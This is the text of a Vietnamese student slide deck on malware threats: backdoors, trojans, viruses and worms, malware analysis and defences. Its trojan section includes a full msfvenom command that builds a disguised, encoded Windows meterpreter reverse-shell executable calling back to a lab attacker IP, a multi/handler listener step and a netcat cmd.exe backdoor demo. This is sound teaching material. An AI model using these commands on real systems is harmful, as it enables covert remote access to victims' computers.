MALWARE THREATS Nhóm 7 Lại Đức Long Bạch Hoàng Hạ Nông Nguyễn Nguyên Phương Cái Xuân Trung Nguyễn Anh Tuấn Malware Malware hoặc phần mềm độc hại là bất kỳ chương trình hoặc tệp nào có hại cho người dùng máy tính. Các chương trình độc hại này có thể thực hiện nhiều chức năng: ăn cắp, mã hóa hoặc xóa dữ liệu nhạy cảm, thay đổi hoặc chiếm đoạt các chức năng và giám sát hoạt động máy tính của người dùng 01 BACKDOOR &TROJAN Backdoor Backdoor hay còn gọi là “cổng sau” là chương trình mà hacker cài đặt trên máy tính của nạn nhân để có thể điều khiển hay xâm nhập lại dễ dàng Nhiệm vụ của Backdoor là lấy tin tức của người đang sử dụng phần mềm, sau đó thực hiện một số thao tác nào đó như gửi thông tin lên server để lưu trữ. Webshell WebShell là 1 dạng mã độc, backdoor sở hữu nhiều các chức năng, giúp hỗ trợ cho quá trình xâm nhập và chiếm lấy quyền quản lý hệ thống các website của các hacker. Mã độc Webshell có thể được upload lên website server sau đó điều khiển và quản lý web đó từ xa. Mặt lợi của backdoor • • • Kiểm tra version của các ứng dụng Xử lý bản quyền Một số website tích hợp backdoor để thiết lập cấu hình chỉ dành riêng cho khách hàng đó Mặt hại của backdoor • • • Sử dụng backdoor để cài các phần mềm độc hại Thu thập thông tin về bạn, các trang web bạn truy cập trên Internet, những thứ bạn tải xuống, tệp bạn mở, tên người dùng, mật khẩu và bất kỳ thứ gì khác có giá trị. Sử dụng máy tính nạn nhân trong 1 cuộc tấn công DDOS Trojan là gì ? Trojan Trojan là một loại phần mềm độc hại thường được ngụy trang dưới dạng phần mềm hợp pháp. Trojan có thể được sử dụng bởi những kẻ trộm mạng và tin tặc cố gắng truy cập vào hệ thống của người dùng Khi xâm nhập vào máy tính của bạn, vi-rút Trojan hoạt động tương tự - nó ẩn bên trong các chương trình dường như vô hại hoặc cố gắng lừa bạn tải xuống MỤC ĐÍCH CỦA TROJAN CÁCH NHẬN BIẾT CUỘC TẤN CÔNG BẰNG TROJAN • • • • • • • • Trình duyệt của máy tính chuyển hướng đến những trang không rõ. Trình Anti-Virus bị vô hiệu hóa hoặc thuộc tính của nó không hoạt động. Tài khoản và mật khẩu bị thay đổi hoặc không chứng thực được. Hình nền và background thay đổi. Xuất hiện các báo cáo mua lạ trong thẻ tín dụng của mình. Ổ CD-ROM mở và đóng bởi nó. Thanh Taskbar biến mất. Cửa sổ thiết lập màu sắc bị thay đổi. CÁC CỔNG PHỔ BIẾN ĐƯỢC SỬ DỤNG BỞI TROJAN Sử dụng Kali Linux dùng để tấn công Win 10 bằng Metaploit msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.128 LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 > application.exe Sử dụng exploit(multi/handler) và payload windows/meterpreter/reverse_tcp để nghe ngóng Thiết lập các thông số yêu cầu Sử dụng lệnh search –f *.txt Qúa trình xâm nhập của Trojan Qúa trình xâm nhập của Trojan được thực hiện bởi một số bước. Các bước này được hacker sử dụng để xâm nhiễm hệ thống mục tiêu: B1: Tạo Trojan sử dụng Trojan Construction Toolkit. B2: Tạo Dropper B3: Tạo Wrapper B4: Truyền nhiễm Trojan B5: Kích hoạt Trojan Sự triển khai của Trojan 07 Các loại Trojan Enter a sbtitle here if you need it Một số loại Trojan phổ biến: - Command Shell Trojan - Defacement Trojan - HTTP/ HTTPS Trojan - Botnet Trojan - Trojan-Proxy Server - Remote Access Trojan - Data-Sending Trojan - Destructive Trojan - Security software disabler Trojan - FTP Trojan 08 Netcat Enter a sbtitle here if you need it Netcat là một trojan dạng dòng lệnh nhưng khá mạnh mẽ và dễ sử dụng. Trước đây, Netcat được xem như một công cụ “sạch” nhưng do bị các hacker sử dụng nhiều vào các mục tiêu không trong sáng nên hiện nay hầu hết chương trình phòng chống virus đều đưa Netcat vào danh sách đen. Công cụ này có khả năng mở những cổng TCP hay UDP trên máy tính bị nhiễm, và hacker sử dụng chương trình telnet để kết nối tới các cổng đã mở 8 và thực hiện nhiều thao tác nguy hiểm như truyền file, thực thi lệnh. Netcat có thể chạy trên hệ thống Windows cũng như Linux, tương tác theo mô hình client / server: Các tính năng ban đầu của netcat bao gồm: - Kết nối đi hoặc đến, TCP hoặc UDP, đến hoặc từ bất kỳ cổng nào - Kiểm tra toàn bộ chuyển tiếp / đảo ngược DNS , với các cảnh báo thích hợp - Khả năng sử dụng bất kỳ cổng nguồn cục bộ nào - Khả năng sử dụng bất kỳ địa chỉ nguồn mạng nào được cấu hình cục bộ - Khả năng quét cổng tích hợp, với tính năng ngẫu nhiên - Tích hợp khả năng định tuyến nguồn rời - Có thể đọc các đối số dòng lệnh từ đầu vào chuẩn - Chế độ gửi chậm, một dòng sau mỗi N giây - Kết xuất hex của dữ liệu đã truyền và đã nhận - Khả năng tùy chọn để cho phép một dịch vụ chương trình khác thiết lập kết nối - Người trả lời tùy chọn -options telnet Demo Netcat Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e cmd.exe Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 Thế nào là “Wrapping” ? Thế nào là “Wrapping” ? ● ● ● Wrapper là một gói phần mềm được sử dụng để đính kèm Tronjan. Thông thường, game và những chương trình có tính hấp dẫn (phim s*x) được sử dụng là wrapper. Để có thế phát tán các mã độc hay trojan / backdoor hacker thường đính kèm những công cụ này vào những công cụ hợp lệ khác Những công cụ đóng gói trojan : 1 2 3 Graffiti Silk Rope 2000 EliTeWrap 4 IconPlus 5 AutoIT Trojan Construction Kit và Trojan Maker Trojan Construction Kit và Trojan Maker ● ● Trojan construction kit va trojan maker là những công cụ mà các hacker dùng để t75 tạo ra các biến thể trojan / backdoor nguy hiểm của riêng mình Một số công cụ dùng để tạo trojan như Senna Spy Generator, Trojan Horse Construction Kit, Pandora’s Box Phòng Chống Trojan Phòng Chống Trojan ● ● Hiện nay có nhiều công cụ thương mại của phần mềm chống Virus, cũng như phát hiện các loại spyware, trojan, backdor và mã độc hại khác Điểm chính trong cơ chế hoạt động của Trojan và Backdor là cài đặt một chương trình trên máy tính. Vì thế cách tốt nhất để tránh nhiệm trojan là không nên cho phép user bình thường có được quyền cài đặt chương trình tùy ý Các khuyến cáo để phòng chống Trojan hiệu quả : ● ● Hạn chế sử dụng chung máy tính, cài đặt mật khẩu bảo vệ. Không mở các tập tin lạ không rõ nguồn gốc, chú ý các file có đuôi mở rộng: exe, bat,com,… ● Không vào các trang web lạ, không click vào các đường link lạ. ● Không cài đặt các phần mềm lạ. ● ● Quét các port đang mở, các tiến trình đang chạy, những thay đổi với Registry, những hoạt động mạng, … Chạy các phần mềm diệt Trojan. Những Công Cụ Giám Sát Port Và Dò Tìm Trojan Fport ● Công cụ miễn phí của Foundstone báo cáo về tình trạng của tất cả các cổng TCP / UDP đang mở cùng với dịch vụ tương ứng hoạt động trên những cổng này. TCP View ● Chương trình hoạt động trên hệ điều hành Windows hiển thị chi tiết các điểm đầu cuối tham gia truyền thông trên TCP / UDP TCP View TCP View TCP View TCP View Process Viewer ● Là ứng dụng dùng để giám sát các tiến trình đang hoạt động, đây là công cụ dạng dòng lệnh rất hay, có khả năng kill (đóng) các tiến trình nguy hiểm. Currport ● Currport liệt kê tất cả các cổng TCP/IP và UDP đang mở trên máy tính của bạn. Với mỗi cổng trong danh sách. Những Công Cụ Giám Sát Port Và Dò Tìm Trojan ● Inzider : Là một ứng dụng hữu ích liệt kê những tiến trình đang hoạt động trên hệ thống Windows và các cổng tương ứng. ● Tripwire : Ứng dụng trên Linux dùng để kiểm tra tính toàn vẹn của hệ thống tập tin. Phòng Chống Trojan Bằng Cách Kiểm Tra Tính Toàn Vẹn Của tập Tin Windows File Protection ● WFP kiểm tra tính toàn vẹn của tập tin khi có sự tác động đến các tập tin SYS, DLL, OCX, TTF hay EXE Virus và Worm Tổng quan chung về virus Giới thiệu về virus ● Virus máy tính là một chương trình máy tính có khả năng tự sao chép chính nó từ đối tượng lây nhiễm này sang đối tượng lây nhiễm khác. Virus máy tính lây lan như thế nào ? ● Virus máy tính có thể lây lan vào máy tính qua email, qua các file tải về từ Internet hay copy từ máy khác về, và cũng có thể lợi dụng các lỗ hổng phần mềm để xâm nhập từ xa, cài đặt lây nhiễm lên máy tính một cách âm thầm Virus máy tính phá hoại những gì ? ● Dù ít hay nhiều thì virus cũng được sinh ra để phục vụ những mục đích không tốt. Các virus thế hệ đầu tiên có thể tàn phá nặng nề dữ liệu, ổ đĩa, hệ thống, hoặc đơn giản hơn chỉ là làm cho màn hình bị lỗi hiển thị với nhiều nhân bản để “ghi điểm”. Tuy nhiên thì các virus như vậy hầu như không còn tồn tại nữa . Các virus ngày nay thường phục vụ cho những mục đích về kinh tế hoặc phá hoại cụ thể Dấu hiệu nhận biết khi máy tính bị nhiễm virus ? ● Truy xuất tập tin, mở các chương trình ứng dụng chậm. ● Khi duyệt web có các trang lạ xuất hiện ● Duyệt web chậm, nội dung các trang web hiển thị lên màn hình chậm ● Góc phải màn hình xuất hiện cảnh báo : “Your computer is infected” hoặc xuất hiện cửa sổ : “Virus Alert” ● Các file lạ tự động sinh ra khi mở ổ đĩa USB ● Xuất hiện các file có phần mở rộng .exe với tên trùng với tên các thư mục Sự khác biệt giữa virus và worm Virus ● ● Có khả năng lây lan (sao Worm ● Có khả năng lây lan (sao chép từ máy tính này sang chép từ máy tính này sang máy tính khác máy tính khác Lây nhiễm qua tệp ● Lây nhiễm qua mạng Phân loại virus ● Một virus máy tính có thể lây nhiễm vào các thành phần sau đây của hệ thống System sector Tập tin Macros (Như MS Word macro) Các tập tin hay hàm thư viên của hệ thống như DLL,INI Disk cluster Tập tin BAT Mã nguồn ứng dụng Các loại virus được phân chia theo cách thức lây lan : ● Polymorphic ● Cavity (space-filler) ● Stealth ● Tunneling ● Fast & Slow Infector ● Camouflage ● Armored ● NTFS & Active Directory ● Multipartie Cách phòng chống và ngăn chạn tác hại của virus máy tính Cách phòng chống và ngăn chạn tác hại của virus máy tính a) Sử dụng phần mềm diệt virus máy tính b) Sử dụng tường lửa cá nhân c) Cập nhật các bản vá lỗi của hệ điều hành d) Theo kinh nghiệm sử dụng máy tính REVERSE ENGINEERING REVERSE ENGINEERING LÀ GÌ ● RE là quá trình tìm hiểu những công nghệ được sử dụng bởi 1 thiết bị, 1 đối tượng hoặc 1 hệ thống thông qua việc phân tích cấu trúc, các chức năng và hoạt động của nó. ● RE là 1 khái niệm rất rộng, bao gồm cả RE phần cứng và RE phần mềm ● Việc phân tích hoạt động cụ thể của một hệ thống hay 1 chương trình sẽ được sử dụng trong việc bảo trì chính hệ thống hay chương trình đó ỨNG DỤNG CỦA RE ● Phân tích malware ● Tìm hiểu cách thức hoạt động của một modul hoặc một hệ thống CÁC VẤN ĐỀ CHÍNH CỦA RE ● Với mỗi một nền tảng, hệ điều hành khác nhau ta có các chương trình được xây dựng khác nhau, thực thi theo cách khác nhau ● Với đặc trưng của mỗi nền tảng, ta có những hướng khác nhau để tiếp cận, những công cụ khác nhau để trợ giúp cho công việc. ● Với các hệ điều hành khác nhau ta sử dụng những công cụ khác nhau ● Những chương trình viết bằng ngôn ngữ khác nhau sẽ có những công cụ RE khác nhau MALWARE ANALYSIS KHÁI QUÁT ● Là quá trình xác định phần mềm độc hại cho đến khi xác minh rằng phần mềm độc hại đã bị loại bỏ hoàn toàn ● Mục tiêu: thu được thông tin chi tiết và quan sát hành vi của phần mềm độc hại QUÁ TRÌNH ● Preparing the Testbed Chuyên gia bảo mật chuẩn bị sẵn máy ảo như một hệ điều hành máy chủ, nơi phân tích phần mềm độc hại động sẽ được thực hiện bằng cách thực thi phần mềm độc hại trên hệ điều hành khách. Hệ điều hành máy chủ này được cách ly khỏi mạng khác để quan sát hành vi của phần mềm độc hại bằng cách cách ly phần mềm độc hại khỏi mạng. QUÁ TRÌNH ● Phân tích tĩnh Được thực hiện bằng cách phân mảnh tài nguyên của tệp nhị phân mà không thực thi nó và nghiên cứu từng thành phần. Trình tháo gỡ như IDA được sử dụng để tháo rời tệp nhị phân. ● Phân tích động Được thực hiện bằng cách thực thi phần mềm độc hại trên máy chủ và quan sát hành vi của phần mềm độc hại trong môi trường Sandbox MỤC TIÊU ● Chẩn đoán mức độ nghiêm trọng của mối đe dọa hoặc mức độ tấn công. ● Chẩn đoán loại Phần mềm độc hại. ● Phạm vi tấn công ● Phòng thủ được xây dựng để bảo mật hệ thống và mạng của tổ chức. ● Tìm ra nguyên nhân gốc rễ. ● Đã xây dựng các hành động ứng phó Sự cố. ● Phát triển Anti-malware để loại bỏ. SHEEP DIPPING ● Là quá trình phân tích tệp và gói tin bị nghi ● ● ngờ chống lại vi-rút và phần mềm độc hại trước khi cho phép chúng có sẵn cho người dùng trong một môi trường bị cô lập Quá trình phân tích này được thực hiện trên một máy tính chuyên dụng. Đây là tuyến phòng thủ ban đầu đang chạy, với tính toán được bảo mật cao cùng với giám sát cổng, giám sát tệp, chống vi-rút và các chương trình bảo mật khác. Hệ thống nhúng cừu có thể được coi là một trường hợp đặc biệt của hộp cát , được sử dụng để kiểm tra phần mềm độc hại. DEMO